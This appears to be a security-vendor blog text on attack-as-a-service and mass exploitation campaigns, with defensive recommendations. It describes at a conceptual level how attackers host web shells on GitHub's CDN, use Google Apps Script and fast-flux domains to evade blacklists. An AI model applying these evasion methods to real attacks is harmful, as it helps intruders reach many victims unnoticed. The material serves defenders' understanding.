DDoS-as-a-service has been around for quite some time and was probably the first foray into the attack-as-a-service model. DDoS-as-a-service was very successful because it removes the necessity for maintaining a large botnet from the attackers themselves. Bot herders could focus instead on growing their botnet and modifying the malware that they used in order to exploit new systems rather than worrying about how much an individual attack was going to impact the botnet as a whole.
From there it was a very short jump to segmenting the bot and allowing for multiple customers to use chunks of it as they needed, rather than throwing the full weight of the bot at a given target. Many of these services operate under the aegis of a “stressor service” for websites to make sure their sites work under load. However, this was merely a fig leaf for the real purpose which was allowing anybody with bitcoin or a credit card to purchase time on a bot and direct attack traffic to a website of their choosing.
The success of this model drove other types of attacks to migrate to the service mode. Ransomware-as-a-service became a very profitable endeavor. Ransomware authors sell turnkey solutions to anybody that has money and provides secure communications, and in some cases even technical support for the victims.
Today, we see a large number of different types of attacks-as-a-service and this makes it very easy for low sophistication attackers to use very high sophistication tools and techniques. Skilled malware authors can use very advanced techniques that would normally be out of the reach of low sophistication attackers, and rather than worrying about being targeted by law enforcement, can simply sell a subscription or a turnkey solution.
This evolution creates new challenges for defenders.
In the past, it would be easy for researchers and security teams with some experience to identify hosting solutions that were known to originate attacks and put them into a network blacklist. This was an easy way to blunt a large number attacks, however as attackers move to cloud services, the fact that there are so many different tenets on these cloud services makes it difficult or impossible to block these IP ranges, and so the first chance of an attack getting past network list is increased dramatically.
Additionally, this type of business makes it possible for low sophistication attackers, or attackers without any knowledge at all, to be able to wield very complicated attack tools against targets simply by paying for a license key.
New technologies are constantly reshaping the business landscape, but business leaders also must consider how these can enable new attacks – or make old mitigations obsolete.
CDN and AI use in Network Exploitation (Pt.1)
In this article we’ll talk about the tactics and procedures observed by Akamai researchers and security teams, as they work through the operational response process of a mass exploitation campaign. Mass Exploitation is a term used to convey the process in which attackers launch an attack campaign in large scale using CDN services, or mass mailing services to reach more victims in less time.
The idea starts with an attacker who has a well-formed payload or exploit, which they need to use at scale in a relatively short period of time.
A common example is a zero-day vulnerability that is posted to an underground forum and purchased by an attacker. As that code starts to get used in the wild, there is a finite amount of time before research teams and incident response teams notice the attack and try to mitigate it. Also, vendor timelines for issuing a patch can vary. This varied timeline of the exploit being “exploitable” is what drives mass exploitation.
There are three main categories for problems as they relate to identification of mass exploitation attempts:
Category One (False Positives): Identifying mass exploitation among the noise in your environment can be daunting. For instance, if you are trying to filter on Remote File Inclusion (RFI) attempts and executed payloads, there is a tremendous amount of noise from security vendors running application scans against your environment looking for risks.This is a RFI test from WhiteHat Security and is very common. If the system being scanned is vulnerable it will download the script and execute it. A process which will be monitored and added to the list of things you need to fix for that system.
Category Two: Further complicating the identification of attack campaigns is purposeful obfuscation by attackers who use techniques such as FastFlux domains and sites like Google or Github to reference content which usually doesn’t raise a lot of attention unless you know what you’re looking for.
Example 1: raw.githubusercontent.com
By utilizing web shells that are located on Github, the attacker
doesn’t need to manage multiple copies of the files as there is little
chance that site/URL reputation services will blacklist the Github
domain. Here the attacker is calling a PHP shell and using Github’s CDN
to utilize caching and acceleration of said shell to the target system.
Example 2: googleusercontent.com
Attackers have taken advantage of other types of cloud services to
distribute their attack traffic as well – one of which is using Google
App Scripts. By creating scripts in Google Sheets that contain scripted
commands, an attacker can make requests look like they’re coming from a
“trusted” location such as Google. Without context, this may go
unnoticed or at least harder to identify good versus bad requests due to
the nature of where the requests are originating.
Unnoticed, until you start to see the volumes of traffic that can be generated from this infrastructure, or if the requests are taking advantage of an application vulnerability to perform mass exploitation.
Category Three: The third category is “timely”
threat intelligence challenges, and large scale visibility challenges.
If Blue Teams can only see threat info on traffic that comes to their
own environment, then it’s challenging to see larger scale trends or
patterns as efficiently.
We frequently see malicious actors upload their malware/exploit code
to more than one third-party website or CDN in an attempt to re-use it,
usually for redundancy purposes or if security devices add the URL to a
blacklist.
When tracking samples, we identified that they were being accessed by
more than one originating IP/ASN which tells us that attackers are
proxying through IPs/ASNs when attempting large scale RFI attacks. This
technique usually indicates the use of Fast Flux domains.
Fast flux is a DNS
technique used by botnets to hide phishing and malware delivery sites
behind an ever-changing network of compromised hosts acting as proxies.
Fast Flux usage is becoming common for two reasons.
- Compromised hosts storing exploit code are being discovered quickly and taken offline before the attackers can make use of them.
- Because attackers are launching exploits at many systems as part of large scale exploitation attempts, they require payloads to be highly available. For this reason, we are seeing an increase in the use of low cost CDN’s to deploy/host attack exploit data.
Interstitial inspection: Using reverse proxies or some form of interstitial device/process to perform inspection and validation of requests prior to sending traffic to back end application servers.
Large scale data / threat correlation: The more data you have about an inbound request (application workflow wise) or IP address via threat intelligence sources, the better. The main thing to focus on here is that you have as much info as possible which usually involves a threat feed and data sharing relationships with partners.
Layered defenses: It’s highly valuable to have both perimeter and forward-facing defenses as well as defenses inside or behind the firewall to watch for malicious activity inside the corporate network as well as requests going out to the internet.